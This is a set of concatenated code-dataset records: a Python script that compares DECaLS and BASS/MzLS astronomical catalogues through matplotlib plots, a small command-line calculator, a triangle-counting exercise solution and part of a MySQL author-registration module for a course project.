ValueError\n #sns.set_style(\"whitegrid\")\n #sns.set_palette('colorblind')\n #c1=sns.color_palette()[2] \n #c2=sns.color_palette()[0] #'b'\n c1= 'b' \n c2= 'r'\n ###\n types= ['PSF','SIMP','EXP','DEV','COMP']\n ind = np.arange(len(types)) # the x locations for the groups\n width = 0.35 # the width of the bars\n ###\n ht_decam, ht_bokmos= np.zeros(5,dtype=int),np.zeros(5,dtype=int)\n for cnt,typ in enumerate(types):\n 
ht_decam[cnt]= np.where(obj[m_types[0]].data['type'] == typ)[0].shape[0] / float(obj['deg2_decam'])\n ht_bokmos[cnt]= np.where(obj[m_types[1]].data['type'] == typ)[0].shape[0] / float(obj['deg2_bokmos'])\n ###\n fig, ax = plt.subplots()\n rects1 = ax.bar(ind, ht_decam, width, color=c1)\n rects2 = ax.bar(ind + width, ht_bokmos, width, color=c2)\n ylab= ax.set_ylabel(\"counts/deg2\")\n if matched: ti= ax.set_title('Matched')\n else: ti= ax.set_title('Unmatched')\n ax.set_xticks(ind + width)\n ax.set_xticklabels(types)\n ax.legend((rects1[0], rects2[0]), ('DECaLS', 'BASS/MzLS'),**leg_args)\n #save\n if matched: name='hist_types_Matched%s.png' % addname\n else: name='hist_types_Unmatched%s.png' % addname\n plt.savefig(os.path.join(get_outdir('bmd'),name), bbox_extra_artists=[ylab,ti], bbox_inches='tight',dpi=150)\n plt.close()\n\n\ndef bin_up(data_bin_by,data_for_percentile, bin_edges=np.arange(20.,26.,0.25)):\n '''finds indices for 0.25 bins, returns bin centers and q25,50,75 percentiles of data_percentile in each bin\n bin_edges: compute percentiles for each sample between bin_edges\n '''\n count= np.zeros(len(bin_edges)-1)+np.nan\n q25,q50,q75= count.copy(),count.copy(),count.copy()\n for i,low,hi in zip(range(len(count)), bin_edges[:-1],bin_edges[1:]):\n ind= np.all((low <= data_bin_by,data_bin_by < hi),axis=0)\n if np.where(ind)[0].size > 0:\n count[i]= np.where(ind)[0].size\n q25[i]= np.percentile(data_for_percentile[ind],q=25)\n q50[i]= np.percentile(data_for_percentile[ind],q=50)\n q75[i]= np.percentile(data_for_percentile[ind],q=75)\n else:\n pass #given qs nan, which they already have\n return (bin_edges[1:]+bin_edges[:-1])/2.,count,q25,q50,q75\n\ndef indices_for_type(obj,inst='m_decam',type='all'):\n '''return mask for selecting type == all,psf,lrg\n data -- obj['m_decam'].data\n lrg mask -- obje['m_decam'].lrg'''\n if type == 'all': \n return np.ones(obj[inst].data['type'].size, dtype=bool) #1 = True\n elif type == 'psf': \n return obj[inst].data['type'] == 'PSF'\n elif type == 'lrg': \n return obj[inst].lrg\n else: raise ValueError\n\n\ndef plot_SN_vs_mag(obj, found_by='matched',type='all', addname=''):\n '''obj['m_decam'] is DECaLS() object\n found_by -- 'matched' or 'unmatched' \n type -- all,psf,lrg'''\n #indices for type == all,psf, or lrg\n assert(found_by == 'matched' or found_by == 'unmatched')\n prefix= found_by[0]+'_' # m_ or u_\n index={}\n for key in ['decam','bokmos']:\n index[key]= indices_for_type(obj,inst=prefix+key,type=type)\n #bin up SN values\n min,max= 18.,25.\n bin_SN=dict(decam={},bokmos={})\n for key in bin_SN.keys():\n for band in ['g','r','z']:\n bin_SN[key][band]={}\n i= index[key]\n bin_edges= np.linspace(min,max,num=30)\n bin_SN[key][band]['binc'],count,bin_SN[key][band]['q25'],bin_SN[key][band]['q50'],bin_SN[key][band]['q75']=\\\n bin_up(obj[prefix+key].data[band+'mag'][i], \\\n obj[prefix+key].data[band+'flux'][i]*np.sqrt(obj[prefix+key].data[band+'flux_ivar'][i]),\\\n bin_edges=bin_edges)\n #setup plot\n fig,ax=plt.subplots(1,3,figsize=(9,3),sharey=True)\n plt.subplots_adjust(wspace=0.25)\n #plot SN\n for cnt,band in zip(range(3),['g','r','z']):\n #horiz line at SN = 5\n ax[cnt].plot([1,40],[5,5],'k--',lw=2)\n #data\n for inst,color,lab in zip(['decam','bokmos'],['b','g'],['DECaLS','BASS/MzLS']):\n ax[cnt].plot(bin_SN[inst][band]['binc'], bin_SN[inst][band]['q50'],c=color,ls='-',lw=2,label=lab)\n ax[cnt].fill_between(bin_SN[inst][band]['binc'],bin_SN[inst][band]['q25'],bin_SN[inst][band]['q75'],color=color,alpha=0.25)\n #labels\n 
ax[2].legend(loc=1,**leg_args)\n for cnt,band in zip(range(3),['g','r','z']):\n ax[cnt].set_yscale('log')\n xlab=ax[cnt].set_xlabel('%s' % band, **laba)\n ax[cnt].set_ylim(1,100)\n ax[cnt].set_xlim(20.,26.)\n ylab=ax[0].set_ylabel('S/N', **laba)\n text_args= dict(verticalalignment='bottom',horizontalalignment='right',fontsize=10)\n ax[2].text(26,5,'S/N = 5 ',**text_args)\n plt.savefig(os.path.join(get_outdir('bmd'),'sn_%s_%s%s.png' % (found_by,type,addname)), bbox_extra_artists=[xlab,ylab], bbox_inches='tight',dpi=150)\n plt.close()\n\ndef plot_matched_dmag_vs_psf_fwhm(obj, type='psf'):\n '''using matched sample, plot diff in mags vs. DECAM psf_fwhm in bins \n obj['m_decam'] is DECaLS() object'''\n #indices\n index= np.all((indices_for_type(b,inst='m_decam',type=type),\\\n indices_for_type(b,inst='m_bokmos',type=type)), axis=0) #both bokmos and decam of same type\n #bin up by DECAM psf_fwhm\n bin_edges= np.linspace(0,3,num=6)\n vals={}\n for band in ['g','r','z']:\n vals[band]={}\n vals[band]['binc'],count,vals[band]['q25'],vals[band]['q50'],vals[band]['q75']=\\\n bin_up(obj['m_decam'].data[band+'_psf_fwhm'][index], \\\n obj['m_bokmos'].data[band+'mag'][index]- obj['m_decam'].data[band+'mag'][index], \\\n bin_edges=bin_edges)\n#setup plot\n fig,ax=plt.subplots(1,3,figsize=(9,3),sharey=True)\n plt.subplots_adjust(wspace=0.25)\n text_args= dict(verticalalignment='center',horizontalalignment='left',fontsize=10)\n #plot\n for cnt,band in zip(range(3),['g','r','z']):\n ax[cnt].plot(vals[band]['binc'], vals[band]['q50'],c='b',ls='-',lw=2)\n ax[cnt].fill_between(vals[band]['binc'],vals[band]['q25'],vals[band]['q75'],color='b',alpha=0.25)\n ax[cnt].text(0.05,0.95,band,transform=ax[cnt].transAxes,**text_args)\n #finish\n xlab=ax[1].set_xlabel('decam PSF_FWHM', **laba)\n ylab=ax[0].set_ylabel(r'Median $\\Delta \\, m$ (decam - bokmos)', **laba)\n ti= plt.suptitle('%s Objects, Matched' % type.upper())\n plt.savefig(os.path.join(get_outdir('bmd'),'dmag_vs_psf_fwhm_%s.png' % type), bbox_extra_artists=[ti,xlab,ylab], bbox_inches='tight',dpi=150)\n plt.close()\n\ndef plot_matched_decam_vs_bokmos_psf_fwhm(obj, type='psf'):\n '''using matched sample, plot decam psf_fwhm vs. 
bokmos psf_fwhm \n obj['m_decam'] is DECaLS() object'''\n #indices\n index= np.all((indices_for_type(b,inst='m_decam',type=type),\\\n indices_for_type(b,inst='m_bokmos',type=type)), axis=0) #both bokmos and decam of same type\n #setup plot\n fig,ax=plt.subplots(1,3,figsize=(9,3),sharey=True)\n plt.subplots_adjust(wspace=0.25)\n text_args= dict(verticalalignment='center',horizontalalignment='left',fontsize=10)\n #plot\n for cnt,band in zip(range(3),['g','r','z']):\n ax[cnt].scatter(obj['m_bokmos'].data[band+'_psf_fwhm'][index], obj['m_decam'].data[band+'_psf_fwhm'][index],\\\n edgecolor='b',c='none',lw=1.)\n ax[cnt].text(0.05,0.95,band,transform=ax[cnt].transAxes,**text_args)\n #finish\n for cnt,band in zip(range(3),['g','r','z']):\n ax[cnt].set_xlim(0,3)\n ax[cnt].set_ylim(0,3)\n xlab=ax[1].set_xlabel('PSF_FWHM (bokmos)', **laba)\n ylab=ax[0].set_ylabel('PSF_FWHM (decam)', **laba)\n ti= plt.suptitle('%s Objects, Matched' % type.upper())\n plt.savefig(os.path.join(get_outdir('bmd'),'decam_vs_bokmos_psf_fwhm_%s.png' % type), bbox_extra_artists=[ti,xlab,ylab], bbox_inches='tight',dpi=150)\n plt.close()\n\n\n\ndef plot_confusion_matrix(cm,ticknames, addname=''):\n '''cm -- NxN array containing the Confusion Matrix values\n ticknames -- list of strings of length == N, column and row names for cm plot'''\n plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues,vmin=0,vmax=1)\n cbar=plt.colorbar()\n plt.xticks(range(len(ticknames)), ticknames)\n plt.yticks(range(len(ticknames)), ticknames)\n ylab=plt.ylabel('True (DECaLS)')\n xlab=plt.xlabel('Predicted (BASS/MzLS)')\n for row in range(len(ticknames)):\n for col in range(len(ticknames)):\n if np.isnan(cm[row,col]):\n plt.text(col,row,'n/a',va='center',ha='center')\n elif cm[row,col] > 0.5:\n plt.text(col,row,'%.2f' % cm[row,col],va='center',ha='center',color='yellow')\n else:\n plt.text(col,row,'%.2f' % cm[row,col],va='center',ha='center',color='black')\n plt.savefig(os.path.join(get_outdir('bmd'),'confusion_matrix%s.png' % addname), bbox_extra_artists=[xlab,ylab], bbox_inches='tight',dpi=150)\n plt.close()\n\ndef create_confusion_matrix(obj):\n '''compares MATCHED decam (truth) to bokmos (prediction)\n return 5x5 confusion matrix and colum/row names\n obj[m_decam'] is DECaLS object'''\n cm=np.zeros((5,5))-1\n types=['PSF','SIMP','EXP','DEV','COMP']\n for i_dec,dec_type in enumerate(types):\n ind= np.where(obj['m_decam'].data['type'] == dec_type)[0]\n for i_bass,bass_type in enumerate(types):\n n_bass= np.where(obj['m_bokmos'].data['type'][ind] == bass_type)[0].size\n if ind.size > 0: cm[i_dec,i_bass]= float(n_bass)/ind.size #ind.size is constant for each loop over bass_types\n else: cm[i_dec,i_bass]= np.nan\n return cm,types\n\ndef plot_matched_separation_hist(d12):\n '''d12 is array of distances in degress between matched objects'''\n #pixscale to convert d12 into N pixels\n pixscale=dict(decam=0.25,bokmos=0.45)\n #sns.set_style('ticks',{\"axes.facecolor\": \".97\"})\n #sns.set_palette('colorblind')\n #setup plot\n fig,ax=plt.subplots()\n #plot\n ax.hist(d12*3600,bins=50,color='b',align='mid')\n ax2 = ax.twiny()\n ax2.hist(d12*3600./pixscale['bokmos'],bins=50,color='g',align='mid',visible=False)\n xlab= ax.set_xlabel(\"arcsec\")\n xlab= ax2.set_xlabel(\"pixels [BASS]\")\n ylab= ax.set_ylabel(\"Matched\")\n #save\n #sns.despine()\n plt.savefig(os.path.join(get_outdir('bmd'),\"separation_hist.png\"), bbox_extra_artists=[xlab,ylab], bbox_inches='tight',dpi=150)\n plt.close()\n\ndef plot_psf_hists(decam,bokmos, zoom=False):\n '''decam,bokmos are 
DECaLS() objects matched to decam ra,dec'''\n #divide into samples of 0.25 mag bins, store q50 of each\n width=0.25 #in mag\n low_vals= np.arange(20.,26.,width)\n med={}\n for b in ['g','r','z']: med[b]=np.zeros(low_vals.size)-100\n for i,low in enumerate(low_vals):\n for band in ['g','r','z']:\n ind= np.all((low <= decam[band+'mag'],decam[band+'mag'] < low+width),axis=0)\n if np.where(ind)[0].size > 0:\n med[band][i]= np.percentile(bokmos[band+'mag'][ind] - decam[band+'mag'][ind],q=50)\n else: \n med[band][i]= np.nan\n #make plot\n #set seaborn panel styles\n #sns.set_style('ticks',{\"axes.facecolor\": \".97\"})\n #sns.set_palette('colorblind')\n #setup plot\n fig,ax=plt.subplots(1,3,figsize=(9,3)) #,sharey=True)\n plt.subplots_adjust(wspace=0.5)\n #plot\n for cnt,band in zip(range(3),['r','g','z']):\n ax[cnt].scatter(low_vals, med[band],\\\n edgecolor='b',c='none',lw=2.) #,label=m_type.split('_')[-1])\n xlab=ax[cnt].set_xlabel('bins of %s (decam)' % band, **laba)\n ylab=ax[cnt].set_ylabel('q50[%s bokmos - decam]' % band, **laba)\n if zoom: ax[cnt].set_ylim(-0.25,0.25)\n # sup=plt.suptitle('decam with matching bokmos',**laba)\n #save\n #sns.despine()\n if zoom: name=\"median_color_diff_zoom.png\"\n else: name=\"median_color_diff.png\"\n plt.savefig(os.path.join(get_outdir('bmd'),name), bbox_extra_artists=[xlab,ylab], bbox_inches='tight',dpi=150)\n plt.close()\n\n##########\n#funcs for flux diff / sqrt(inv var + inv var)\ndef n_gt_3_sigma(sample, low=-8.,hi=8.):\n '''for a sample that should be distributed as N(mean=0,stddev=1), returns mask for the N that are greater 3 sigma\n low,hi -- minimum and maximum sample values that will be considered'''\n i_left= np.all((sample >= low,sample <= -3.),axis=0)\n i_right= np.all((sample <= hi,sample>=3),axis=0)\n #assert i_left and i_right are mutually exclusive\n false_arr= np.all((i_left,i_right),axis=0) #should be array of Falses\n assert( np.all(false_arr == False) ) #should be np.all([True,True,...]) which evaluates to True\n return np.any((i_left,i_right),axis=0)\n\ndef gauss_stats(n_samples=10000):\n '''returns mean,std,q25, frac outliers > 3 sigma for n_samples drawn from unit gaussian N(0,1)'''\n G= sp_stats.norm(0,1)\n mean=std=q25=perc_out=0.\n for i in range(10): #draw 10 times, take avg of the 10 measurements of each statistic\n draws= G.rvs(n_samples) \n mean+= np.mean(draws)\n std+= np.std(draws)\n q25+= np.percentile(draws,q=25)\n perc_out+= 2*G.cdf(-3)*100 #HACH same number ea time\n mean/= 10.\n std/= 10.\n q25/= 10.\n perc_out/= 10.\n tol=1e-1\n assert(abs(mean) <= tol)\n assert(abs(std-1.) 
<= tol)\n return mean,std,q25,perc_out\n\ndef sample_gauss_stats(sample, low=-20,hi=20):\n '''return dictionary of stats about the data and stats for a sample that is unit gaussian distributed\n low,hi -- minimum and maximum sample values that will be considered'''\n a=dict(sample={},gauss={})\n #vals for unit gaussian distributed data\n a['gauss']['mean'],a['gauss']['std'],a['gauss']['q25'],a['gauss']['perc_out']= gauss_stats(n_samples=sample.size)\n #vals for actual sample\n a['sample']['mean'],a['sample']['std'],a['sample']['q25'],a['sample']['q75']= \\\n np.mean(sample),np.std(sample),np.percentile(sample,q=25),np.percentile(sample,q=75) \n i_outliers= n_gt_3_sigma(sample, low=low,hi=hi)\n a['sample']['perc_out']= sample[i_outliers].size/float(sample.size)*100.\n return a\n\n\ntext_args= dict(verticalalignment='center',fontsize=8)\ndef plot_dflux_chisq(b,type='psf', low=-8.,hi=8.,addname=''):\n #join indices b/c matched\n i_type= np.all((indices_for_type(b, inst='m_decam',type=type),\\\n indices_for_type(b, inst='m_bokmos',type=type)), axis=0) #both bokmos and decam of same type\n #get flux diff for each band\n hist= dict(g=0,r=0,z=0)\n binc= dict(g=0,r=0,z=0)\n stats=dict(g=0,r=0,z=0)\n #chi \n sample,mag={},{}\n for band in ['g','r','z']:\n sample[band]= (b['m_decam'].data[band+'flux'][i_type]-b['m_bokmos'].data[band+'flux'][i_type])/np.sqrt(\\\n np.power(b['m_decam'].data[band+'flux_ivar'][i_type],-1)+np.power(b['m_bokmos'].data[band+'flux_ivar'][i_type],-1))\n mag[band]= 22.5-2.5*np.log10(b['m_decam'].data[band+'flux'][i_type])\n #loop over mag bins, one 3 panel for each mag bin\n for b_low,b_hi in zip([18,19,20,21,22,23],[19,20,21,22,23,24]):\n #plot each filter\n for band in ['g','r','z']:\n imag= np.all((b_low <= mag[band],mag[band] < b_hi),axis=0)\n #print(\"len(imag)=\",len(imag),\"len(sample)=\",len(sample),\"len(sample[imag])=\",len(sample[imag]))\n hist[band],bins,junk= plt.hist(sample[band][imag],range=(low,hi),bins=50,normed=True)\n db= (bins[1:]-bins[:-1])/2\n binc[band]= bins[:-1]+db\n plt.close() #b/c plt.hist above\n #for drawing unit gaussian N(0,1)\n G= sp_stats.norm(0,1)\n xvals= np.linspace(low,hi)\n #plot\n fig,ax=plt.subplots(1,3,figsize=(9,3),sharey=True)\n plt.subplots_adjust(wspace=0.25)\n for cnt,band in zip(range(3),['g','r','z']):\n ax[cnt].step(binc[band],hist[band], where='mid',c='b',lw=2)\n ax[cnt].plot(xvals,G.pdf(xvals))\n #labels\n for cnt,band in zip(range(3),['g','r','z']):\n if band == 'r': xlab=ax[cnt].set_xlabel(r'%s $(F_{d}-F_{bm})/\\sqrt{\\sigma^2_{d}+\\sigma^2_{bm}}$' % band, **laba)\n else: xlab=ax[cnt].set_xlabel('%s' % band, **laba)\n #xlab=ax[cnt].set_xlabel('%s' % band, **laba)\n ax[cnt].set_ylim(0,0.6)\n ax[cnt].set_xlim(low,hi)\n ylab=ax[0].set_ylabel('PDF', **laba)\n ti=ax[1].set_title(\"%s (%.1f <= %s < %.1f)\" % (type,b_low,band,b_hi),**laba)\n #put stats in suptitle\n plt.savefig(os.path.join(get_outdir('bmd'),'dflux_chisq_%s_%.1f-%s-%.1f%s.png' % (type,b_low,band,b_hi,addname)), bbox_extra_artists=[ti,xlab,ylab], bbox_inches='tight',dpi=150)\n plt.close()\n################\n\ndef plot_magRatio_vs_mag(b,type='psf',addname=''):\n #join indices b/c matched\n i_type= np.all((indices_for_type(b, inst='m_decam',type=type),\\\n indices_for_type(b, inst='m_bokmos',type=type)), axis=0) #both bokmos and decam of same type\n #plot\n fig,ax=plt.subplots(1,3,figsize=(9,3),sharey=True)\n plt.subplots_adjust(wspace=0.25)\n for cnt,band in zip(range(3),['g','r','z']):\n magRatio= 
np.log10(b['m_bokmos'].data[band+'flux'][i_type])/np.log10(b['m_decam'].data[band+'flux'][i_type]) -1.\n mag= 22.5-2.5*np.log10(b['m_decam'].data[band+'flux'][i_type])\n ax[cnt].scatter(mag,magRatio, c='b',edgecolor='b',s=5) #,c='none',lw=2.)\n #labels\n for cnt,band in zip(range(3),['g','r','z']):\n xlab=ax[cnt].set_xlabel('%s AB' % band, **laba)\n ax[cnt].set_ylim(-0.5,0.5)\n ax[cnt].set_xlim(18,26)\n ylab=ax[0].set_ylabel(r'$m_{bm}/m_d - 1$', **laba)\n ti=ax[1].set_title("%s" % type,**laba)\n #put stats in suptitle\n plt.savefig(os.path.join(get_outdir('bmd'),'magRatio_vs_mag_%s%s.png' % (type,addname)), bbox_extra_artists=[ti,xlab,ylab], bbox_inches='tight',dpi=150)\n plt.close()\n################\n\n\n\ntext_args= dict(verticalalignment='center',fontsize=8)\ndef plot_N_per_deg2(obj,type='all',req_mags=[24.,23.4,22.5],addname=''):\n '''image requirements grz<=24,23.4,22.5\n compute number density in each bin for each band mag [18,requirement]'''\n #indices for type for matched and unmatched samples\n index={}\n for inst in ['m_decam','u_decam','m_bokmos','u_bokmos']:\n index[inst]= indices_for_type(obj, inst=inst,type=type) \n bin_nd=dict(decam={},bokmos={})\n for inst in ['decam','bokmos']:\n bin_nd[inst]={}\n for band,req in zip(['g','r','z'],req_mags):\n bin_nd[inst][band]={}\n bin_edges= np.linspace(18.,req,num=15)\n i_m,i_u= index['m_'+inst], index['u_'+inst] #need m+u\n #join m_decam,u_decam OR m_bokmos,u_bokmos and only with correct all,psf,lrg index\n sample= np.ma.concatenate((obj['m_'+inst].data[band+'mag'][i_m], obj['u_'+inst].data[band+'mag'][i_u]),axis=0)\n bin_nd[inst][band]['binc'],bin_nd[inst][band]['cnt'],q25,q50,q75=\\\n bin_up(sample,sample,bin_edges=bin_edges)\n #plot\n fig,ax=plt.subplots(1,3,figsize=(9,3),sharey=True)\n plt.subplots_adjust(wspace=0.25)\n for cnt,band in zip(range(3),['g','r','z']):\n for inst,color,lab in zip(['decam','bokmos'],['b','g'],['DECaLS','BASS/MzLS']):\n ax[cnt].step(bin_nd[inst][band]['binc'],bin_nd[inst][band]['cnt']/obj['deg2_'+inst], where='mid',c=color,lw=2,label=lab)\n #labels\n for cnt,band in zip(range(3),['g','r','z']):\n xlab=ax[cnt].set_xlabel('%s' % band) #, **laba)\n #ax[cnt].set_ylim(0,0.6)\n #ax[cnt].set_xlim(maglow,maghi)\n ax[0].legend(loc='upper left', **leg_args)\n ylab=ax[0].set_ylabel('counts/deg2') #, **laba)\n ti=plt.suptitle("%ss" % type.upper(),**laba)\n # Make space for and rotate the x-axis tick labels\n fig.autofmt_xdate()\n #put stats in suptitle\n plt.savefig(os.path.join(get_outdir('bmd'),'n_per_deg2_%s%s.png' % (type,addname)), bbox_extra_artists=[ti,xlab,ylab], bbox_inches='tight',dpi=150)\n plt.close()\n\n\nparser=argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description='DECaLS simulations.')\nparser.add_argument('-fn1', type=str, help='file listing the DECaLS (decam) tractor catalogues',required=True)\nparser.add_argument('-fn2', type=str, help='file listing the BASS/MzLS (bokmos) tractor catalogues',required=True) \nparser.add_argument('--verbose', action='store_true', help='enable DEBUG logging')\nargs = parser.parse_args()\n\n# Set the debugging level\nif args.verbose:\n lvl = logging.DEBUG\nelse:\n lvl = logging.INFO\nlogging.basicConfig(format='%(message)s', level=lvl, stream=sys.stdout)\nlog = logging.getLogger(__name__)\n\n#get lists of tractor cats to compare\nfns_1= read_lines(args.fn1) \nfns_2= read_lines(args.fn2) \nlog.info('Combining tractor catalogues: %s',fns_1) \n#if fns_1.size == 1: fns_1,fns_2= [fns_1],[fns_2]\n#object to store concatenated matched tractor cats\na=Matched_Cats()\nfor cnt,cat1,cat2 in zip(range(len(fns_1)),fns_1,fns_2):\n data_1,data_2,m1,m2,m1_unm,m2_unm,d12, 
deg2_decam,deg2_bokmos= match_it(cat1,cat2)\n if cnt == 0:\n a.initialize(data_1,data_2,m1,m2,m1_unm,m2_unm,d12, deg2_decam,deg2_bokmos)\n else: \n a.add_d12(d12)\n a.deg2_decam+= deg2_decam\n a.deg2_bokmos+= deg2_bokmos\n a.add_dict('m_decam', targets.data_extract(data_1,m1) )\n a.add_dict('m_bokmos', targets.data_extract(data_2,m2))\n a.add_dict('u_decam', targets.data_extract(data_1,m1_unm))\n a.add_dict('u_bokmos', targets.data_extract(data_2,m2_unm))\n#each key a.data[key] becomes DECaLS() object with grz mags,i_lrg, etc\nb={}\nb['d12']= a.d12\nb['deg2_decam']= a.deg2_decam\nb['deg2_bokmos']= a.deg2_bokmos\nfor match_type in a.data.keys(): b[match_type]= targets.DECaLS(a.data[match_type], w1=True)\n#store N matched objects not masked before join decam,bokmos masks\nm_decam_not_masked,m_bokmos_not_masked= b['m_decam'].count_not_masked(),b['m_bokmos'].count_not_masked()\n#update masks for matched objects to be the join of decam and bokmos masks\nmask= np.any((b['m_decam'].mask, b['m_bokmos'].mask),axis=0)\nb['m_decam'].update_masks_for_everything(mask=np.any((b['m_decam'].mask, b['m_bokmos'].mask),axis=0),\\\n mask_wise=np.any((b['m_decam'].mask_wise, b['m_bokmos'].mask_wise),axis=0) )\nb['m_bokmos'].update_masks_for_everything(mask=np.any((b['m_decam'].mask, b['m_bokmos'].mask),axis=0),\\\n mask_wise=np.any((b['m_decam'].mask_wise, b['m_bokmos'].mask_wise),axis=0) )\n\n#plots\n#plot_radec(b)\n#plot_matched_separation_hist(b['d12'])\n# Depths are very different so develop a cut to make fair comparison\n#plot_SN_vs_mag(b, found_by='matched',type='psf')\n# mask=True where BASS SN g < 5 or BASS SN r < 5\nsn_crit=5.\nmask= np.any((b['m_bokmos'].data['gflux']*np.sqrt(b['m_bokmos'].data['gflux_ivar']) < sn_crit,\\\n b['m_bokmos'].data['rflux']*np.sqrt(b['m_bokmos'].data['rflux_ivar']) < sn_crit),\\\n axis=0)\nb['m_decam'].update_masks_for_everything(mask=mask, mask_wise=mask)\nb['m_bokmos'].update_masks_for_everything(mask=mask, mask_wise=mask)\n# contintue with fairer comparison\n#plot_radec(b,addname='snGe5')\n#plot_HistTypes(b,m_types=['m_decam','m_bokmos'],addname='snGe5')\n#plot_SN_vs_mag(b, found_by='matched',type='psf',addname='snGe5')\n#plot_SN_vs_mag(b, found_by='matched',type='all')\n#plot_SN_vs_mag(b, found_by='matched',type='lrg')\n#plot_SN_vs_mag(b, found_by='unmatched',type='all')\n#plot_SN_vs_mag(b, found_by='unmatched',type='psf')\n#plot_SN_vs_mag(b, found_by='unmatched',type='lrg')\n#cm,names= create_confusion_matrix(b)\n#plot_confusion_matrix(cm,names,addname='snGe5')\nplot_dflux_chisq(b,type='psf',addname='snGe5')\n#plot_dflux_chisq(b,type='all',addname='snGe5')\n# Number density cutting to requirement mags: grz<=24,23.4,22.5\nprint('square deg covered by decam=',b['deg2_decam'],'and by bokmos=',b['deg2_bokmos'])\n#plot_N_per_deg2(b,type='psf',addname='snGe5')\n#plot_N_per_deg2(b,type='lrg',addname='snGe5')\nplot_magRatio_vs_mag(b,type='psf',addname='snGe5')\n\n\n\n\nprint('exiting early')\nsys.exit()\n\nplot_matched_dmag_vs_psf_fwhm(b, type='psf')\nplot_matched_decam_vs_bokmos_psf_fwhm(b, type='psf')\n\nprint('finished comparison: bass-mosaic-decals')\n#sys.exit()\n#\n#\n##REVISE THIS BELOW\n##print stats of total objects, each group, # masked, etc\n#print(\"---- DECAM ----\")\n#print(\"N not masked due to grz= %d, N total= %d\" % \\\n# (m_decam_not_masked+b['u_decam'].count_not_masked(), b['m_decam'].count_total()+b['u_decam'].count_total()))\n#print(\"-- Matched --\")\n#print(\"N not masked before join bokmos mask= %d, N not masked after= %d\" % \\\n# 
(m_decam_not_masked, b['m_decam'].count_not_masked()))\n#print(\"-- Unmatched -- \")\n#print(\"N masked before join bokmos mask = N masked after = %d\" % \\\n# (b['u_decam'].count_total()- b['u_decam'].count_not_masked()))\n####bokmos\n#print(\"---- BOKMOS ----\")\n#print(\"N not masked due to grz= %d, N total= %d\" % \\\n# (m_bokmos_not_masked+b['u_bokmos'].count_not_masked(), b['m_bokmos'].count_total()+b['u_bokmos'].count_total()))\n#print(\"-- Matched --\")\n#print(\"N not masked before join decam mask= %d, N not masked after= %d\" % \\\n# (m_bokmos_not_masked, b['m_bokmos'].count_not_masked()))\n#print(\"-- Unmatched -- \")\n#print(\"N masked before join decam mask = N masked after = %d\" % \\\n# (b['u_bokmos'].count_total()- b['u_bokmos'].count_not_masked()))\n#print('done')\n\n\n","repo_name":"DriftingPig/Obi-Metallica","sub_path":"legacypipe/py/legacyanalysis/compare_tractor_cats.py","file_name":"compare_tractor_cats.py","file_ext":"py","file_size_in_byte":32364,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"}
+{"seq_id":"26174447291","text":"# pylint: disable=missing-module-docstring,missing-function-docstring,eval-used\nimport sys\n\nimport operator\n\ndef main():\n \"\"\"Implement the calculator\"\"\"\n\n\n ops = {\n '+': operator.add,\n '-': operator.sub,\n '*': operator.mul,\n '/': operator.truediv, # use operator.div for Python 2\n '%': operator.mod,\n '^': operator.xor,\n }\n # print(ops[sys.argv[2]])\n # result = sys.argv[1] + ops[sys.argv[2]] + sys.argv[3]\n result = ops[sys.argv[2]](int(sys.argv[1]), int(sys.argv[3]))\n return result\n\nif __name__ == \"__main__\":\n print(main())\n \n","repo_name":"chachine/data-challenges","sub_path":"01-Python/01-Programming-Basics/05-System-Parameters/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"11859652716","text":"def binary_search(a, i):\r\n MOD = 1000000007\r\n lo = 0\r\n hi = i-1\r\n ans = 0\r\n while lo < hi:\r\n if a[lo]+a[hi] > a[i]:\r\n ans = (ans+hi-lo)%MOD\r\n hi = hi-1\r\n else:\r\n lo = lo+1\r\n return ans\r\n\r\nclass Solution:\r\n # @param A : list of integers\r\n # @return an integer\r\n def nTriang(self, A):\r\n MOD = 1000000007\r\n n = len(A)\r\n A.sort()\r\n ans = 0\r\n for i in range(n-1, 1, -1):\r\n ans =(ans+binary_search(A, i))%MOD\r\n return ans\r\n","repo_name":"PrinceSinghhub/InterviewBit-Two-Pointers","sub_path":"Interview Bit Two Pointer/Counting Triangles.py","file_name":"Counting Triangles.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"}
+{"seq_id":"17774572585","text":"# COSC 61, Professor Palmer \n# Authors: Abby Owen, Annie Revers\n# author_operations.py - SQL commands for author operations\n\nfrom mysql.connector import MySQLConnection, Error, errorcode, FieldType\nfrom dbconfig import read_db_config\nimport getpass\nfrom ManUser import *\n\n\n# TODO: File BLOBs for insert manuscript\n\n########### register_author ###########\ndef register_author(mycursor, words):\n\n insert_user = \"INSERT INTO SysUser (UserType) VALUES (%s)\"\n user_type = (\"author\", )\n \n \n try: \n mycursor.execute(insert_user, user_type)\n user_id = mycursor.lastrowid\n\n q1 = \"INSERT INTO Author (AuthorId, AuthorFirstName, AuthorLastName, AuthorEmail, AuthorAffiliation) VALUES (%s, %s, %s, %s, %s)\"\n val = (user_id, words[2], words[3], words[4], words[5])\n \n mycursor.execute(q1, val)\n \n print(f\"Thank you for registering. Your author ID is {user_id}\")\n return user_id\n except Error as err:\n print(f\"Error registering author: {err}\")\n return None\n\n\n########### login_author ###########\ndef login_author(mycursor, id):\n \n q = \"SELECT * FROM Author WHERE AuthorId = (%s)\"\n val = int(id)\n try:\n mycursor.execute(q, (val,))\n res = mycursor.fetchone()\n row = dict(zip(mycursor.column_names, res))\n \n print(f\"WELCOME AUTHOR {row['AuthorFirstName']} {row['AuthorLastName']}\".format(row))\n return row\n \n except Error as err:\n print(f\"Error logging in author, no author found with this ID: {err}\")\n return None\n\n\n########### check_author ###########\ndef check_author(mycursor, fname, lname, order):\n check_exist_sql = \"SELECT EXISTS(SELECT 1 FROM Author WHERE AuthorFirstName = %s AND AuthorLastName = %s)\"\n\n vals = (fname, lname)\n try: \n mycursor.execute(check_exist_sql, vals)\n res = mycursor.fetchone()\n if res[0] == 0:\n return None\n else:\n get_id_sql = \"SELECT AuthorId FROM Author WHERE AuthorFirstName = %s AND AuthorLastName = %s\"\n vals = (fname, lname)\n try: \n mycursor.execute(get_id_sql, vals)\n id = mycursor.fetchone()[0]\n return id\n except Error as err:\n print(f\"Error getting co author ID: {err}\")\n return None\n \n 